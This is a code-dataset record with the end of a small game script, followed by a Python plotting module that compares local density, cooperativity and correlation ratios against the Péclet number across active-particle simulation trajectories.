        cpumove(cpu, user, board)
        drawboard(board)
    while True:
        usermove(user, board)
        if _finished(user):
            break
        cpumove(cpu, user, board)
        if _finished(cpu):
            break
'''
Lines below is the entry point of the script
'''
# Run the game only when executed directly, not when imported as a module.
# NOTE(review): main() is defined earlier in the file (outside this view).
if __name__ == '__main__':
    main()
'''End of Code'''
| 22.688776 | 92 | 0.616483 | 333 | 0.037441 | 0 | 0 | 0 | 0 | 0 | 0 | 3,243 | 0.364628 |
aa062c465b8cb43f800d6ab5306626908026dc9e | 22,484 | py | Python | plot/comparison.py | yketa/UBC---Spring-2018---code | b065544639a483dda48cda89bcbb11c1772232aa | [
"MIT"
] | 1 | 2021-12-15T13:38:13.000Z | 2021-12-15T13:38:13.000Z | plot/comparison.py | yketa/UBC---Spring-2018---code | b065544639a483dda48cda89bcbb11c1772232aa | [
"MIT"
] | 1 | 2019-05-25T20:00:17.000Z | 2019-05-25T20:00:17.000Z | plot/comparison.py | yketa/UBC---Spring-2018---code | b065544639a483dda48cda89bcbb11c1772232aa | [
"MIT"
] | 1 | 2020-01-22T17:05:18.000Z | 2020-01-22T17:05:18.000Z | """
Module comparison superimposes most probable local density, maximum
cooperativity, time of maximum cooperativity and ratio of transversal and
longitudinal correlations at time of maximum cooperativity, as functions of
the Péclet number, for different trajectories in the phase diagram (either
varying persistence time at fixed self-propelling velocity or varying
self-propelling velocity at fixed persistence time).
Simulation directories must follow the active_particles.naming.AHB2D naming
standard and input files in simulation directories must follow the
active_particles.naming.VarN standard (local densities) and either the
active_particles.naming.Cuu standard (for cooperativities from displacement
correlations), or active_particles.naming.Cww standard (for cooperativities
from displacement relative to centre of mass displacement correlations), or
active_particles.naming.Cdd standard (for cooperativities from displacement
norm correlations), or active_particles.naming.Cee (for cooperativities from
displacement direction correlations).
Environment modes
-----------------
CORRELATION : string
Correlations from which to calculate cooperativities and extract
longitudinal and transversal components.
_____________________________________________________________
| Mode | Correlations |
|______|______________________________________________________|
| Cuu | displacement |
|______|______________________________________________________|
| Cww | displacement relative to centre of mass displacement |
|______|______________________________________________________|
| Cdd | displacement norm |
|______|______________________________________________________|
| Cee | displacement direction |
|______|______________________________________________________|
DEFAULT: Cuu
DRDT : bool
Use the product of the rotation diffusion constant and lag time rather
than the bare lag time.
DEFAULT: True
SHOW : bool
Show comparison plot.
DEFAULT: True
Environment parameters
----------------------
DATA_DIRECTORY : string
Data directory.
DEFAULT: active_particles.naming.sim_directory
EXCLUDE : string
Simulation directories in DATA_DIRECTORY to exclude from the plots.
DEFAULT:
PARAMETERS_FILE : string
Simulation parameters file name.
DEFAULT: active_particles.naming.parameters_file
IMAGE_NAME : string
Default image file name.
DEFAULT: active_particles.plot.comparison._image_name
N : int
Number of particles.
DEFAULT: active_particles.plot.comparison._N
VARIABLES (mandatory) : string separated by ':'
Trajectory variable in order of trajectory.
_______________________________________
| Mode | Variable |
|_________|_____________________________|
| 'dr' | Rotation diffusion constant |
|_________|_____________________________|
| 'vzero' | self-propelling velocity |
|_________|_____________________________|
VAR_MIN (mandatory) : float separated by ':'
Minimum value of trajectory variable in order of trajectory.
VAR_MAX (mandatory) : float separated by ':'
Maximum value of trajectory variable in order of trajectory.
VAR_C (mandatory) : float separated by ':'
Trajectory variable transition value in order of trajectory.
NOTE: A vertical line is displayed at the corresponding Péclet number.
FIXED_VAR (mandatory) : float separated by ':'
Fixed variable value in order of trajectory.
DENSITIES (mandatory) : float separated by ':'
Packing fractions of particles in order of trajectory.
INITIAL_FRAME_PHILOC : int
Frame to consider as initial in local densities calculations.
DEFAULT: active_particles.plot.pphiloc._init_frame
INTERVAL_MAXIMUM_PHILOC : int
Maximum number of frames on which densities are calculated.
DEFAULT: active_particles.plot.pphiloc._int_max
BOX_SIZE_PHILOC : float
Length of the square boxes in which particles are counted.
DEFAULT: active_particles.plot.pphiloc._box_size
N_CASES_PHILOC : int
Number of boxes in each direction in which local densities are computed.
DEFAULT: active_particles.plot.pphiloc._Ncases
N_BINS : int
Number of bins for the local densities histogram.
DEFAULT: active_particles.plot.pphiloc._Nbins
PHIMAX : float
Maximum local density for the local densities histogram.
DEFAULT: active_particles.plot.pphiloc._phimax
BOX_SIZE_COR : float
Size of the square box which was considered for correlations.
DEFAULT: simulation box size
X_ZERO : float
Centre of the of the box x-coordinate for correlations.
DEFAULT: 0
Y_ZERO : float
Centre of the of the box y-coordinate for correlations.
DEFAULT: 0
INITIAL_FRAME_COR : int
Frame to consider as initial for correlations.
DEFAULT: active_particles.plot.chi_msd._init_frame_cor
INTERVAL_MAXIMUM_COR : int
Maximum number of intervals of length dt considered for correlations.
DEFAULT: active_particles.plot.chi_msd._int_max_cor
N_CASES_COR : int
Number of boxes in each direction with which the displacement grid is
computed.
DEFAULT: active_particles.plot.chi_msd._Ncases_cor
R_MIN : float
Minimum radius for correlations integration.
DEFAULT: active_particles.plot.chi_msd._r_min
R_MAX : float
Maximum radius for correlations integration.
DEFAULT: active_particles.plot.chi_msd._r_max
FONT_SIZE : int
Plot font size.
DEFAULT: active_particles.plot.comparison._font_size
MARKER_SIZE : int
Plot marker size.
DEFAULT: active_particles.plot.comparison._marker_size
COLORMAPS : string separated by ':'
Plot colormaps to choose from.
DEFAULT: active_particles.plot.comparison._colormaps
RATIO_LEGEND : float
Width ratio between legend and figure.
DEFAULT: active_particles.plot.comparison._ratio_legend
WSPACE : float
Plots width space.
DEFAULT: active_particles.plot.comparison._wspace
HSPACE : float
Plots height space.
DEFAULT: active_particles.plot.comparison._hspace
X_SCALE : string
Plots x-scale.
DEFAULT: active_particles.plot.comparison._x_scale
PHILOC_YS : string
Most probable local density y-scale.
DEFAULT: active_particles.plot.comparison._philoc_ys
CHI_YS : string
Maximum cooperativity y-scale.
DEFAULT: active_particles.plot.comparison._chi_ys
DT_YS : string
Time of maximum cooperativity y-scale.
DEFAULT: active_particles.plot.comparison._dt_ys
RATIOTL_YS : string
Ratio of transversal and longitudinal correlations y-scale.
DEFAULT: active_particles.plot.comparison._ratioTL_ys
Output
------
> Saves figure to IMAGE_NAME.
[SHOW mode]
> Displays plot.
"""
import active_particles.naming as naming

from active_particles.init import get_env, get_env_list

from os import environ as envvar
# Force plots to be displayed when this module is executed as a script.
if __name__ == '__main__': envvar['SHOW'] = 'True'

from os.path import join as joinpath

from active_particles.plot.plot import list_colormap, list_markers,\
    list_linestyles
from active_particles.plot.pphiloc import Philoc,\
    _init_frame as _init_frame_philoc, _int_max as _int_max_philoc,\
    _box_size as _box_size_philoc, _Ncases as _Ncases_philoc,\
    _Nbins, _phimax
from active_particles.plot.chi_msd import ChiMsd,\
    _init_frame_cor, _int_max_cor, _Ncases_cor, _r_min, _r_max
from active_particles.plot.corlcort import CLCT

import matplotlib as mpl
import matplotlib.pyplot as plt
from matplotlib.gridspec import GridSpec
from matplotlib.lines import Line2D
# DEFAULT VARIABLES
# Module-level defaults; each can be overridden through the environment
# variables documented in the module docstring.

_N = int(1e5)   # default number of particles

_font_size = 25     # default plot font size
_marker_size = 20   # default plot marker size
_colormaps = ('cool', 'hot')    # default plot colormaps

_wspace = 0.4   # default plot width space
_hspace = 0.05  # default plot height space

_ratio_legend = 2   # default width ratio between graphs and legends

_x_scale = 'log'    # default plots x-scale
_philoc_ys = 'linear'   # default most probable local density y-scale
_chi_ys = 'log'     # default maximum cooperativity y-scale
_dt_ys = 'log'      # default time of maximum cooperativity y-scale
_ratioTL_ys = 'linear'  # default ratio of transversal and longitudinal correlations y-scale

_image_name = joinpath(get_env('HOME'), 'comparison.eps')   # default image file name
# SCRIPT

if __name__ == '__main__':  # executing as script

    # VARIABLES DEFINITIONS
    # One entry per trajectory in each of the following lists.

    var = get_env_list('VARIABLES')                         # plot variables
    var_min = get_env_list('VAR_MIN', vartype=float)        # minimum values of plot variable
    var_max = get_env_list('VAR_MAX', vartype=float)        # maximum values of plot variable
    var_c = get_env_list('VAR_C', vartype=float)            # plot variable transition value
    fixed_var = get_env_list('FIXED_VAR', vartype=float)    # values of fixed variables
    densities = get_env_list('DENSITIES', vartype=float)    # packing fractions of particles

    # all per-trajectory lists must describe the same number of trajectories
    if not(len(var) == len(var_min) == len(var_max) == len(fixed_var)
        == len(var_c) == len(densities)):
        raise IndexError(
            'VARIABLES, VAR_MIN, VAR_MAX, VAR_C, FIXED_VAR and DENSITIES \
            must have equal lengths.')
    comparisons = len(var)  # number of trajectories to compare

    var_label = []      # variables labels
    fix_label = []      # fixed variable labels
    var_attribute = []  # variables attribute to be displayed in file names
    pe_func = []        # Peclet number as function of plot variable
    for index in range(comparisons):
        if var[index] == 'dr':
            var_label += ['\\tilde{\\nu}_r']
            fix_label += ['\\tilde{v}']
            var_attribute += [{'vzero': fixed_var[index]}]
            # the immediately-called outer lambda freezes `index`, so each
            # Peclet function keeps its own trajectory (late-binding fix)
            pe_func += [(lambda index: lambda x: fixed_var[index]/x)(index)]
        elif var[index] == 'vzero':
            var_label += ['\\tilde{v}']
            fix_label += ['\\tilde{\\nu}_r']
            var_attribute += [{'dr': fixed_var[index]}]
            pe_func += [(lambda index: lambda x: x/fixed_var[index])(index)]
        else: raise ValueError('Variable %s is not known.' % var[index])

    cor = get_env('CORRELATION', default='Cuu') # correlation variable
    if cor == 'Cuu':    # cooperativities from displacement correlations
        naming_cor = naming.Cuu()               # correlations naming object
        cor_name = 'C_{uu}'                     # correlations name
    elif cor == 'Cww':  # ... from displacement relative to centre of mass
        naming_cor = naming.Cww()               # correlations naming object
        cor_name = 'C_{\\delta u \\delta u}'    # correlations name
    elif cor == 'Cdd':  # ... from displacement norm
        naming_cor = naming.Cdd()               # correlations naming object
        cor_name = 'C_{|u||u|}'                 # correlations name
    elif cor == 'Cee':  # ... from displacement direction
        naming_cor = naming.Cee()               # correlations naming object
        cor_name = 'C_{\\hat{u}\\hat{u}}'       # correlations name
    else: raise ValueError('Correlation %s is not known.' % cor)    # correlation is not known

    data_dir = get_env('DATA_DIRECTORY', default=naming.sim_directory) # data directory
    excluded_directories = get_env('EXCLUDE', default='')   # directories to exclude
    parameters_file = get_env('PARAMETERS_FILE',
        default=naming.parameters_file) # simulations parameters file name

    N = get_env('N', default=_N, vartype=int)   # number of particles

    init_frame_philoc = get_env('INITIAL_FRAME_PHILOC',
        default=_init_frame_philoc, vartype=int)    # frame to consider as initial in local densities calculations
    int_max_philoc = get_env('INTERVAL_MAXIMUM_PHILOC',
        default=_int_max_philoc, vartype=int)   # maximum number of frames on which densities are calculated
    box_size_philoc = get_env('BOX_SIZE_PHILOC',
        default=_box_size_philoc, vartype=float)    # length of the square boxes in which particles are counted
    Ncases_philoc = get_env('N_CASES_PHILOC',
        default=_Ncases_philoc, vartype=int)    # number of boxes in each direction in which local densities are computed
    Nbins = get_env('N_BINS', default=_Nbins, vartype=int)  # number of bins for the local densities histogram
    phimax = get_env('PHIMAX', default=_phimax, vartype=float)  # maximum local density for the local densities histogram

    box_size_cor = get_env('BOX_SIZE_COR', vartype=float)   # size of the square box which was considered for correlations
    centre_cor = (get_env('X_ZERO', default=0, vartype=float),
        get_env('Y_ZERO', default=0, vartype=float))    # centre of the box for correlations
    init_frame_cor = get_env('INITIAL_FRAME_COR',
        default=_init_frame_cor, vartype=int)   # frame to consider as initial for correlations
    int_max_cor = get_env('INTERVAL_MAXIMUM_COR',
        default=_int_max_cor, vartype=int)  # maximum number of intervals of length dt considered for correlations
    Ncases_cor = get_env('N_CASES_COR', default=_Ncases_cor, vartype=int)   # number of boxes in each direction with which the displacement grid is computed
    r_min = get_env('R_MIN', default=_r_min, vartype=float) # minimum radius for correlations integration
    r_max = get_env('R_MAX', default=_r_max, vartype=float) # maximum radius for correlations integration

    # NAMING
    # Hash tables of attributes which appear in input file names.

    attributes_philoc = {'N': N, 'init_frame': init_frame_philoc,
        'int_max': int_max_philoc, 'Ncases': Ncases_philoc,
        'box_size': box_size_philoc}    # attributes displayed in local densities file names
    attributes_cor = {'N': N, 'init_frame': init_frame_cor,
        'int_max': int_max_cor, 'Ncases': Ncases_cor, 'box_size': box_size_cor,
        'x_zero': centre_cor[0], 'y_zero': centre_cor[1]}   # attributes displayed in correlations file names

    naming_varN = naming.VarN()     # varN naming object
    naming_simdir = naming.AHB2D()  # simulation directory naming object
    # PLOT PARAMETERS

    font_size = get_env('FONT_SIZE', default=_font_size, vartype=float)     # plot font size
    marker_size = get_env('MARKER_SIZE', default=_marker_size, vartype=int) # plot marker size
    mpl.rcParams.update({'font.size': font_size,
        'lines.markersize': marker_size})

    colormaps = get_env_list('COLORMAPS')   # plot colormaps
    if colormaps == []: colormaps = _colormaps  # no plot colormaps provided, use default
    # duplicate the colormap list until there is at least one per trajectory
    while len(colormaps) < comparisons: colormaps += colormaps

    ratio_legend = get_env('RATIO_LEGEND',
        default=_ratio_legend, vartype=float)   # width ratio between graphs and legends
    wspace = get_env('WSPACE', default=_wspace, vartype=float)  # plots width space
    hspace = get_env('HSPACE', default=_hspace, vartype=float)  # plots height space

    x_scale = get_env('X_SCALE', default=_x_scale)  # plots x-scale
    philoc_ys = get_env('PHILOC_YS', default=_philoc_ys)    # most probable local density y-scale
    chi_ys = get_env('CHI_YS', default=_chi_ys) # maximum cooperativity y-scale
    dt_ys = get_env('DT_YS', default=_dt_ys)    # time of maximum cooperativity y-scale
    ratioTL_ys = get_env('RATIOTL_YS', default=_ratioTL_ys) # ratio of transversal and longitudinal correlations y-scale

    multiply_with_dr = get_env('DRDT', default=True, vartype=bool)  # plot dr*dt rather than dt
    if multiply_with_dr:
        dt_label = r'$\tilde{\nu}_r \Delta t^*$'    # dt label
    else: dt_label = r'$\Delta t^*$'    # dt label

    # CALCULATION
    # One calculator object per trajectory, in trajectory order.

    philoc = []     # local densities histogram calculators
    chimsd = []     # cooperativities calculators
    clct = []       # longitudinal and transversal correlations calculators
    for v, vmin, vmax, phi, vattribute\
        in zip(var, var_min, var_max, densities, var_attribute):

        philoc += [Philoc(data_dir, naming_simdir,
            {'density': phi, **vattribute, **attributes_philoc},
            parameters_file, v, vmin, vmax, excluded_dir=excluded_directories)]
        philoc[-1].calculate(naming_varN,
            {'density': phi, **vattribute, **attributes_philoc}, Nbins, phimax)

        chimsd += [ChiMsd(data_dir, naming_simdir,
            {'density': phi, **vattribute, **attributes_cor},
            parameters_file, v, vmin, vmax, excluded_dir=excluded_directories)]
        chimsd[-1].calculate(naming_cor,
            {'density': phi, **vattribute, **attributes_cor}, r_min, r_max,
            box_size=box_size_cor, multiply_with_dr=multiply_with_dr)

        clct += [CLCT(data_dir, naming_simdir,
            {'density': phi, **vattribute, **attributes_cor},
            parameters_file, v, vmin, vmax, excluded_dir=excluded_directories)]
        clct[-1].calculate(naming_cor,
            {'density': phi, **vattribute, **attributes_cor},
            multiply_with_dr=multiply_with_dr)
        clct[-1].calculate_max(chimsd[-1].dtmax)
    # PLOT

    # per-trajectory hash tables: colour per variable value, marker per
    # simulation time step
    colors = list(map(
        lambda philoc_traj, chimsd_traj, clct_traj, cmap:
            list_colormap(
                sorted(philoc_traj.var_list + chimsd_traj.var_list +
                    clct_traj.var_list),
                colormap=cmap),
        *(philoc, chimsd, clct, colormaps)))    # plot colors hash tables
    markers = list(map(
        lambda philoc_traj, chimsd_traj, clct_traj:
            list_markers(
                sorted(philoc_traj.time_step_list + chimsd_traj.time_step_list
                    + clct_traj.time_step_list)),
        *(philoc, chimsd, clct)))   # plot markers hash tables
    linestyles = list_linestyles(range(comparisons))    # Peclet transition values vertical lines

    fig = plt.figure()
    fig.set_size_inches(30, 30)
    fig.subplots_adjust(wspace=wspace)
    fig.subplots_adjust(hspace=hspace)

    fig.suptitle(
        r'$N=%.2e$' % N + '\n' + r'$[%s]:$' % cor_name
        + r'$S_{init}=%.2e, S_{max}=%.2e,$' % (init_frame_cor, int_max_cor)
        + r'$N_{cases}=%.2e, r_{min}=%.2e,$' % (Ncases_cor, r_min)
        + r'$r_{max}=%.2e$' % r_max + '\n'
        + r'$[\phi^*_{loc}]: S_{init}=%.2e,$' % init_frame_philoc
        + r'$S_{max}=%.2e, N_{cases}=%.2e,$' % (int_max_philoc, Ncases_philoc)
        + r'$r_{max}=%.2e$' % box_size_philoc)

    # one wide column of 4 stacked graphs, plus one narrow legend column
    # per trajectory
    gs = GridSpec(4, 1 + comparisons,
        width_ratios=[1] + comparisons*[1/(comparisons*ratio_legend)])

    ax_philoc = plt.subplot(gs[0, 0])   # most probable local density
    ax_philoc.set_xscale(x_scale)
    ax_philoc.set_yscale(philoc_ys)
    ax_philoc.set_ylabel(r'$\phi^*_{loc}$')

    ax_chi = plt.subplot(gs[1, 0])  # maximum cooperativity
    ax_chi.set_xscale(x_scale)
    ax_chi.set_yscale(chi_ys)
    ax_chi.set_ylabel(r'$\chi(\Delta t^*) = \frac{1}{L^2}$'
        + r'$\int_{r=r_{min}}^{r=r_{max}} dr 2 \pi r %s(r, \Delta t^*)$'
        % cor_name)

    ax_dt = plt.subplot(gs[2, 0])   # time of maximum cooperativity
    ax_dt.set_xscale(x_scale)
    ax_dt.set_yscale(dt_ys)
    ax_dt.set_ylabel(dt_label)

    ax_ratioTL = plt.subplot(gs[3, 0])  # transversal/longitudinal ratio
    ax_ratioTL.set_xscale(x_scale)
    ax_ratioTL.set_xlabel(r'$Pe$')
    ax_ratioTL.set_yscale(ratioTL_ys)
    ax_ratioTL.set_ylabel(r'$%s^T/%s^L(\Delta t^*)$' % (cor_name, cor_name))

    # only the bottom graph keeps its x tick labels (shared Pe axis)
    plt.setp(
        [ax.get_xticklabels() for ax in [ax_philoc, ax_chi, ax_dt]],
        visible=False)

    axes_legend = [plt.subplot(gs[:, 1 + traj]) for traj in range(comparisons)]

    for (phi, f_label, f_var, c_label, c_var, x_func, philoc_traj, chimsd_traj,
        clct_traj, colors_traj, markers_traj, linestyle, ax_legend)\
        in zip(densities, fix_label, fixed_var, var_label, var_c, pe_func,
        philoc, chimsd, clct, colors, markers, linestyles.values(),
        axes_legend):

        x_func_var_c = x_func(c_var)    # Peclet number at the transition value

        # most probable local density vs. Peclet number
        ax_philoc.axvline(x_func_var_c, color='black', linestyle=linestyle)
        for dir in philoc_traj.philocmax:
            var_value = philoc_traj.var_hash[dir]
            ax_philoc.scatter(
                x_func(var_value), philoc_traj.philocmax[dir],
                color=colors_traj[var_value],
                marker=markers_traj[philoc_traj.time_step[dir]])

        # maximum cooperativity vs. Peclet number
        ax_chi.axvline(x_func_var_c, color='black', linestyle=linestyle)
        for dir in chimsd_traj.chimax:
            if not(chimsd_traj.isinvarinterval[dir]): continue
            var_value = chimsd_traj.var_hash[dir]
            ax_chi.scatter(
                x_func(var_value), chimsd_traj.chimax[dir],
                color=colors_traj[var_value],
                marker=markers_traj[chimsd_traj.time_step[dir]])

        # time of maximum cooperativity vs. Peclet number
        ax_dt.axvline(x_func_var_c, color='black', linestyle=linestyle)
        for dir in chimsd_traj.dtmax:
            if not(chimsd_traj.isinvarinterval[dir]): continue
            var_value = chimsd_traj.var_hash[dir]
            ax_dt.scatter(
                x_func(var_value), chimsd_traj.dtmax[dir],
                color=colors_traj[var_value],
                marker=markers_traj[chimsd_traj.time_step[dir]])

        # transversal/longitudinal correlation ratio vs. Peclet number
        ax_ratioTL.axvline(x_func_var_c, color='black', linestyle=linestyle)
        for dir in clct_traj.ratioTL_max:
            var_value = clct_traj.var_hash[dir]
            ax_ratioTL.scatter(
                x_func(var_value), clct_traj.ratioTL_max[dir],
                color=colors_traj[var_value],
                marker=markers_traj[clct_traj.time_step[dir]])

        # per-trajectory legend: header, transition line style, colour per
        # variable value, marker per time step (lw=0 entries are spacers)
        legend = [
            Line2D([0], [0], lw=0,
                label=r'$\phi=%1.2f, %s=%.1e$' % (phi, f_label, f_var)),
            Line2D([0], [0], lw=0),
            Line2D([0], [0], linestyle=linestyle, color='black',
                label=r'$%s = %.1e$' % (c_label, c_var)),
            Line2D([0], [0], lw=0)]
        legend += list(map(
            lambda var_value: Line2D([0], [0],
                color=colors_traj[var_value],
                label=r'$%s = %.1e$' % (c_label, var_value)),
            colors_traj))
        legend += [Line2D([0], [0], lw=0)]
        legend += list(map(
            lambda time_step: Line2D([0], [0], lw=0, color='black',
                marker=markers_traj[time_step],
                label=r'$dt = %.1e$' % time_step),
            markers_traj))

        ax_legend.axis('off')
        ax_legend.legend(handles=legend, loc='center')

    # SAVING
    fig.savefig(get_env('IMAGE_NAME', default=_image_name))

    # SHOW
    if get_env('SHOW', default=True, vartype=bool): plt.show()
| 44.172888 | 156 | 0.677059 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 11,247 | 0.500133 |